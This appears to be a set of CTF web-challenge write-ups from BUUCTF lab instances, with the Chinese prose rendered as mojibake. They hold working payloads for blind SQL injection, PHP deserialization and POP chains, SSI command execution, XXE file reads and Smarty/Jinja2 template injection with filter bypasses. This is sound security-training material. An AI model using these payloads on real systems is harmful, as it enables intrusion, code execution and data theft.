Ìáʾ˵×Ô¼ºÄÜ¿´µ½,˵Ã÷±¾µØ·ÃÎʾͿÉÒÔ¿´µ½,ËùÒÔÎÒÃÇÒªÔÚÇëÇóÖмÓÈëX-Forwarded-For ,ÔÚBurp SuiteÖй¹ÔìÇëÇó:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:29832
X-Forwarded-For: 127.0.0.1
×¢Òâ×îºó¿ÕÁ½ÐÐ,·¢ËͺóµÃµ½flag¡£
References
https://www.cnblogs.com/h3ng/p/12899957.html
[¼«¿Í´óÌôÕ½ 2019]FinalSQL
½øÈëÍøÕ¾,·¢ÏÖÌáʾ:
´ó¼ÒºÃ!ÎÒÊÇÁ·Ï°Ê±³£Á½Äê°ëµÄ,¸öÈËWEB³ÌÐòÔ±cl4y,ÎÒ»áphp,PYTHON,mysql,SQLäע
ËùÒÔ´ó¸ÅÊÇÒªÓÃSQLäע¡£ÎÒÃÇÒªÕÒ×¢Èëµã¡£°´ÕÕÌáʾµãÎå¸öµã,µ«Ëû˵»¹ÓеÚÁù¸öµã,Ð޸ĴËʱµÄurl:
/search.php?id=6
ÕâÓ¦¸Ã¾ÍÊÇ×¢ÈëµãÁË¡£Óöþ·ÖËã·¨pythonµÃµ½flag:
import re
import requests
url = "http://8ca9d6e1-3757-47ac-950d-0ab7df0f5935.node3.buuoj.cn/search.php"
def payload(i,j):
sql = "0^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)"%(i,j)
data = {"id": sql}
r = requests.get(url, params = data)
if "Click" in r.text:
res = 1
else:
res = 0
return res
def exp():
flag = ''
for i in range(1,10000):
low = 31
high = 127
while low <= high:
mid = (low + high) // 2
res = payload(i, mid)
if res:
low = mid + 1
else:
high = mid - 1
finalchar = (low + high + 1) // 2
flag += chr(finalchar)
if flag[-1] == '}':
break
print(flag)
exp()
ÕâÀïÓõ½ÁËÒì»ò×¢Èë,0^1=1 , 0^0=0 ¡£µ±id=1 »ò0 ʱ,Ò³ÃæÏÔʾÄÚÈݲ»Ò»Ñù,Òò´Ë,Èç¹û
0^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d
·µ»Ø1 ,˵Ã÷Òì»òºÅºóÃæµÄÓï¾ä·µ»Ø1 ,Åжϲéѯ½á¹ûµÄµ±Ç°×Ö·ûÊÇ·ñÔÚÕâÒ»°ëµÄ·¶Î§Àï,È»ºóËõС·¶Î§,×îºóÕÒµ½Õâ¸ö×Ö·û,Öظ´²½Öè,Ö±ÖÁÈ«²¿ÕÒµ½¡£
References
https://www.cnblogs.com/wangtanzhi/p/12305052.html
[NPUCTF2020]ReadlezPHP
°´F12´ò¿ªÔ´´úÂë,·¢ÏÖÁ´½Ó:
<p>°ÙÍòÇ°¶ËµÄNPU±¨Ê±ÖÐÐÄΪÄú±¨Ê±:<a href="./time.php?source"></a></p>
·ÃÎÊÁ´½Ó:
/time.php?source
·¢ÏÖÔ´´úÂë:
<?php
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
·¢ÏÖÐòÁл¯,¹¹Ôìpayload:
<?php
class HelloPhp {
public $a = "phpinfo()";
public $b = "assert";
}
$a = new HelloPhp();
echo serialize($a);
?>
assert º¯Êý:¹¦ÄÜÊÇÅжÏÒ»¸ö±í´ïʽÊÇ·ñ³ÉÁ¢,·µ»Øtrue or false ,ÖصãÊǺ¯Êý»áÖ´Ðд˱í´ïʽ¡£Èç¹û±í´ïʽΪº¯ÊýÈçassert(¡°echo(1)¡±) ,Ôò»áÊä³ö1 ,¶øÈç¹ûΪassert(¡°echo 1;¡±) Ôò²»»áÓÐÊä³ö¡£
ÊäÈëurl:
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
ÔÚphpinfo() Ò³ÃæËÑË÷flag¼´¿ÉµÃµ½flag¡£
References
https://www.cnblogs.com/h3ng/p/12890693.html
[BJDCTF2020]EasySearch
ÓÃdirsearchɨÃè:
python dirsearch.py -u http://6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
·¢ÏÖ/index.php.swp ,·ÃÎÊ/index.php.swp :
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
µ±ÃÜÂëµÄmd5 µÄÇ°ÁùλµÈÓÚ6d0bc1 ,µÇ½³É¹¦¡£
python½Å±¾:
import hashlib
i = 0
while True:
m = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if m[0:6] == '6d0bc1':
print(i, " ", m)
break
i +=1
todo¿ÉÄÜÌ«ÂýÁË,¶àÏß³ÌÌá¸ßËÙ¶È?
¹¹ÔìÇëÇó:
POST /index.php HTTP/1.1
Host: 6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=123&password=2020666
·¢ÏÖÏìӦͷ:
Url_is_here: public/05824f6f3fbef89116dee0e9a8da86e3330ab96b.shtml
·ÃÎÊ´ËÎļþ,Ìáʾ:
Hello,123
data: Wednesday, 28-Apr-2021 15:02:31 UTC
Client IP: 172.16.128.254
ûÓÐʲô·¢ÏÖ,ËÑË÷shtml ©¶´,·¢ÏÖ<!--#exec cmd="ÃüÁî"--> ¿ÉÒÔÔ¶³ÌÃüÁîÈÎÒâÖ´ÐЩ¶´¡£
References
http://zone.secevery.com/article/1142
¹¹ÔìÇëÇó:
POST /index.php HTTP/1.1
Host: 6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
username=<!--#exec cmd="find / -name flag*"-->&password=2020666
·¢ÏÖÏìӦͷ:
Url_is_here: public/501795be0e8b58d9ad8c3047f5302a5844845344.shtml
·ÃÎÊ´ËÎļþ,ÕÒµ½flagÎļþ:
/var/www/html/flag_990c66bf85a09c664f0b6741840499b2
¹¹ÔìÇëÇó:
POST /index.php HTTP/1.1
Host: 6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
username=<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666
ÔٴηÃÎÊÏìӦͷµÄÎļþ,µÃµ½flag¡£
References
https://blog.csdn.net/SopRomeo/article/details/105225341
https://www.cnblogs.com/wangtanzhi/p/12354394.html
[MRCTF2020]Ezpop
´ò¿ªÍøÒ³,·¢ÏÖÔ´´úÂë:
Welcome to index.php
<?php
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
ħÊõ·½·¨:
__construct()//µ±Ò»¸ö¶ÔÏó´´½¨Ê±±»µ÷Óà __destruct() //µ±Ò»¸ö¶ÔÏóÏú»Ùʱ±»µ÷Óà __toString() //µ±Ò»¸ö¶ÔÏó±»µ±×÷Ò»¸ö×Ö·û´®Ê¹Óà __sleep() //ÔÚ¶ÔÏóÔÚ±»ÐòÁл¯Ö®Ç°ÔËÐÐ __wakeup() //½«ÔÚ·´ÐòÁл¯Ö®ºóÁ¢¼´±»µ÷ÓÃ(ͨ¹ýÐòÁл¯¶ÔÏóÔªËظöÊý²»·ûÀ´Èƹý) __get() //»ñµÃÒ»¸öÀàµÄ³ÉÔ±±äÁ¿Ê±µ÷ÓÃ,·ÃÎʲ»´æÔÚµÄÊôÐÔ»òÊÇÊÜÏÞµÄÊôÐÔʱµ÷Óà __set() //ÉèÖÃÒ»¸öÀàµÄ³ÉÔ±±äÁ¿Ê±µ÷Óà __invoke() //µ÷Óú¯ÊýµÄ·½Ê½µ÷ÓÃÒ»¸ö¶ÔÏóʱµÄ»ØÓ¦·½·¨ _call() **//µ±µ÷ÓÃÒ»¸ö¶ÔÏóÖеIJ»ÄÜÓõķ½·¨µÄʱºò¾Í»áÖ´ÐÐÕâ¸öº¯Êý
References
https://www.jianshu.com/p/40ab1c531fcc
ÀûÓÃ˼·ÊÇ
- ¿´µ½
Modifier Õâ¸öÀà,·¢ÏÖ¿ÉÒÔinclude Ò»¸öÎļþ,µ±$value ÌáÈ¡flag.php ʱ¾Í»áÏÔʾflag,ʵÏÖÕâÒ»ÇÐÊ×ÏÈÒªµ÷ÓÃappend() º¯Êý,·¢ÏÖ__invoke º¯Êýµ÷ÓÃÁËappend º¯Êý, - ÄÇÏÖÔÚµÄÎÊÌâÊÇÈçºÎµ÷ÓÃ
__invoke ,µ±Modifier Óú¯ÊýµÄÐÎʽµ÷ÓõÄʱºòµ÷ÓÃ__invoke ,ÎÒÃǼì²éÒ»ÏÂ,·¢ÏÖTest ÀàÖÐ:
public function __get($key){
$function = $this->p;
return $function();
}
Èç¹ûpµÄÖµÊÇModifier ,ÔÚreturn $function(); ʱ,¾Í»á´¥·¢__invoke ¡£
- ÄÇÈçºÎÖ´ÐÐ
__get º¯ÊýÄØ,±ØÐëµ÷ÓÃTest ²»´æÔڵıäÁ¿²Å»áÖ´ÐÐ__get ,·¢ÏÖShow ÀàÖÐ:
public function __toString(){
return $this->str->source;
}
Èç¹ûstr ÖµÊÇTest ,µ÷Óò»´æÔڵıäÁ¿source ʱ,¾Í»á´¥·¢__get º¯Êý¡£
- ÄÇÈçºÎ´¥·¢
__toString ÄØ?µ±Show Àà±»µ±³É×Ö·û´®Ê¹ÓÃʱ¾Í»áµ÷ÓÃ__toString ,·¢ÏÖ:
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
Èç¹û´´½¨Show Ààʱ,´«µÝµÄ²ÎÊýÊÇShow Ààʱ,¾Í»áµ÷ÓÃ__toString ¡£
- ÄÇÈçºÎµ÷ÓÃ
__construct ÄØ?Ö±½ÓʵÀý»¯Ò»¸öÀà¾ÍÐÐÁË¡£
½«ÒÔÉϹý³ÌÄæ¹ýÀ´,ÍêÕûphp ´úÂë:
<?php
class Modifier {
protected $var = "php://filter/convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
public function __construct($file){
$this->source = $file;
}
}
class Test{
public $p;
}
$a = new Show();
$a->str = new Test();
$a->str->p = new Modifier();
$b = new Show($a);
echo urlencode(serialize($b));
?>
$var ²»ÄÜÖ±½ÓÊÇflag.php ,ÐèҪʹÓÃphp://filter À´¶ÁÈ¡±àÂë,·ñÔòÖ±½Óinclude Ï൱ÓÚÖ´ÐжøÒÑ,¿´²»µ½½á¹û¡£
Ö®ËùÒÔÐèÒªurl±àÂëurlencode(serialize($b)) ,ÒòΪprotected±äÁ¿¾·´ÐòÁл¯ºó,±äÁ¿ÃûΪ:\x00*\x00 ´æÔÚ²»¿É¼û×Ö·û\x00 ,Ö±½Óecho serialize($b) ¿´²»µ½\00¡£
½«ÔËÐнá¹ûÊäÈëurl:
/?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
½«ÍøÒ³·µ»ØµÄ½á¹ûÓÃbase64 ½âÂë,µÃµ½flag¡£
[NCTF2019]True XML cookbook
´ò¿ªÍøÒ³,·¢ÏÖÊǵǼҳÃæ¡£Ëæ±ãÊäÈëÓû§ÃûÃÜÂë,ÓÃBurp SuiteÀ¹½Ø:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Length: 61
Accept: application/xml, text/xml, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Content-Type: application/xml;charset=UTF-8
Origin: http://9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Referer: http://9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Connection: close
<user><username>123</username><password>123</password></user>
ÆäÖз¢ÏÖContent-Type: application/xml;charset=UTF-8,˵Ã÷¿ÉÄÜ´æÔÚxxe ʵÌå×¢È멶´,³¢ÊÔXXE ¹¥»÷,ÏßÑ°ÕÒ»ØÏԵ㡣¹¹ÔìÇëÇó:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 106
<!DOCTYPE a[
<!ENTITY b "abc">
]>
<user><username>&b;</username><password>admin</password></user>
ÏìÓ¦ÊÇ:
<result><code>0</code><msg>abc</msg></result>
·¢ÏÖ´æÔÚ»ØÏÔµã,˵Ã÷´æÔÚxxe ©¶´,³¢ÊÔÀûÓÃfile:// ,php:// µÈαÐÒé½øÐлñÈ¡Îļþ,¹¹ÔìÇëÇó:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 126
<!DOCTYPE a[
<!ENTITY b system "file:///flag.php">
]>
<user><username>&b;</username><password>admin</password></user>
ÏìÓ¦±¨´í,²»´æÔÚÕâÑùµÄÎļþ,³¢ÊÔ·ÃÎÊLinux¸÷ÖÖÅäÖÃÎļþ:
/etc/hosts ´¢´æÓòÃû½âÎöµÄ»º´æ /etc/passwd Óû§ÃÜÂë /proc/net/arp ÿ¸öÍøÂç½Ó¿ÚµÄarp ±íÖÐdev °ü
¹¹ÔìÇëÇó:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 127
<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///etc/hosts">
]>
<user><username>&b;</username><password>admin</password></user>
ÏìӦûÓз¢ÏÖÓмÛÖµµÄÄÚÈÝ¡£
¹¹ÔìÇëÇó·ÃÎÊ/proc/net/arp :
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 130
<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///proc/net/arp">
]>
<user><username>&b;</username><password>admin</password></user>
ÏìÓ¦ÖÐÓÐÒ»¸ö·þÎñÆ÷10.0.8.2 ,ÀûÓÃC ¶ÎÐá̽ÕÒµ½¿ÉÓõÄÄÚÍø·þÎñÆ÷¡£
C ¶ÎÖ¸µÄÊÇͬһÄÚÍø¶ÎÄÚµÄÆäËû·þÎñÆ÷,ÿ¸öIP ÓÐABCD Ëĸö¶Î,¾Ù¸öÀý×Ó,192.168.0.1 ,A ¶Î¾ÍÊÇ192 ,B ¶ÎÊÇ168 ,C ¶ÎÊÇ0 ,D ¶ÎÊÇ1 ,¶øC ¶ÎÐá̽µÄÒâ˼¾ÍÊÇÄÃÏÂËüͬһC ¶ÎÖеÄÆäÖÐһ̨·þÎñÆ÷,Ò²¾ÍÊÇ˵ÊÇD ¶Î1-255 ÖеÄһ̨·þÎñÆ÷,È»ºóÀûÓù¤¾ßÐá̽ÄÃϸ÷þÎñÆ÷¡£
ÓÃBurp Suite±¬ÆÆD ¶Î,ÔÚÊôÓÚ10.0.8.11 µÄÏìÓ¦Öз¢ÏÖflag¡£
References
https://blog.csdn.net/weixin_43221560/article/details/108152738
https://www.cnblogs.com/renhaoblog/p/13026361.html
https://www.icode9.com/content-4-802965.html
[CISCN2019 »ª¶«ÄÏÈüÇø]Web11
todoΪʲôÄÜÏëµ½{if}
´ò¿ªÍøÒ³,ÍøÒ³µ×²¿Ìáʾ:Build with Smarty
¹¹ÔìÇëÇó:
GET / HTTP/1.1
Host: node3.buuoj.cn:26290
X-Forwarded-For: {if system("ls /")}{/if}
Êä³ö¸ùĿ¼Îļþ,·¢ÏÖflag Îļþ¡£
¹¹ÔìÇëÇó:
GET / HTTP/1.1
Host: node3.buuoj.cn:26290
X-Forwarded-For: {if system("cat /flag")}{/if}
µÃµ½flag¡£
References
https://webcache.googleusercontent.com/search?q=cache:Stzr1ION8tcJ:https://www.cnblogs.com/kanowill/p/12856683.html+&cd=1&hl=zh-CN&ct=clnk
https://www.freebuf.com/column/219913.html
[GYCTF2020]FlaskApp
·½·¨Ò» SSTI¶ÁÎļþ
´ò¿ªÌâÄ¿,ÌáʾÊÇflask ¿ò¼Ü,˵Ã÷ÐèÒªÓõ½ssti ¡£
·¢ÏÖbase64 ½âÃÜʱ,Ëæ±ãÊäÈëÒ»¸ö²»·ûºÏbase64¸ñʽµÄ×Ö·û´®»á±¨´í,ÔÚ±¨´íÐÅÏ¢ÖÐÕÒµ½/app/app.py ,µã¿ª·¢ÏÖapp.py Ô´Âë¡£
@app.route('/decode',methods=['POST','GET'])
def decode():
if request.values.get('text') :
text = request.values.get("text")
text_decode = base64.b64decode(text.encode())
tmp = "½á¹û : {0}".format(text_decode.decode())
if waf(tmp) :
flash("no no no !!")
return redirect(url_for('decode'))
res = render_template_string(tmp)
µ«ÕâÖ»ÊÇÒ»²¿·Ö,Ïë°ì·¨»ñÈ¡app.py ÍêÕûµÄÔ´Âë,ÐèÒª¶ÁÈ¡app.py ¡£
base64 ¼ÓÃÜÒÔÏÂ×Ö·û´®:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__.__builtins__.open('app.py','r').read() }}{% endif %}{% endfor %}
»òÕß:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__.open('app.py','r').read() }}
È»ºóÔÚ½âÃÜÒ³ÃæÓÃbase64 ½âÂë,ÍøÒ³»ØÏÔapp.py µÄÔ´Âë,·¢ÏÖºÚÃûµ¥:
black_list = [&
ÆÁ±ÎÁËflag ,import ,os µÈ´Ê¡£
³¢ÊÔ¶ÁȡĿ¼,base64 ¼ÓÃÜÒÔÏÂ×Ö·û´®:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__.__builtins__['__imp'+'ort__']('o'+'s').listdir('/') }}{% endif %}{% endfor %}
»òÕß:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
È»ºóÔÚ½âÃÜÒ³ÃæÓÃbase64 ½âÂë,·¢ÏÖflagÎļþΪ:this_is_the_flag.txt ,base64 ¼ÓÃÜÒÔÏÂ×Ö·û´®:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
»òÕß:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__.open('/this_is_the_fl'+'ag.txt','r').read()}}
ÓÃÇÐƬ±ÜÃâ×Ö·û´®Æ´½Ó:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__.open('txt.galf_eht_si_siht/'[::-1],'r').read()}}
È»ºóÔÚ½âÃÜÒ³ÃæÓÃbase64 ½âÂë,µÃµ½flag¡£
todo payload½âÊÍһϡ£¡£
References
https://blog.csdn.net/qq_45521281/article/details/106639111
https://blog.csdn.net/Alexhcf/article/details/108400293
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2
https://zhuanlan.zhihu.com/p/32138231
https://webcache.googleusercontent.com/search?q=cache:mBcxIwryiNcJ:https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html+&cd=2&hl=zh-CN&ct=clnk
https://www.cnblogs.com/h3zh1/p/12694933.html
·½·¨¶þ PINÂ뱬ÆÆ
todoÓÐʱ¼äÔÙ¿´¡£
|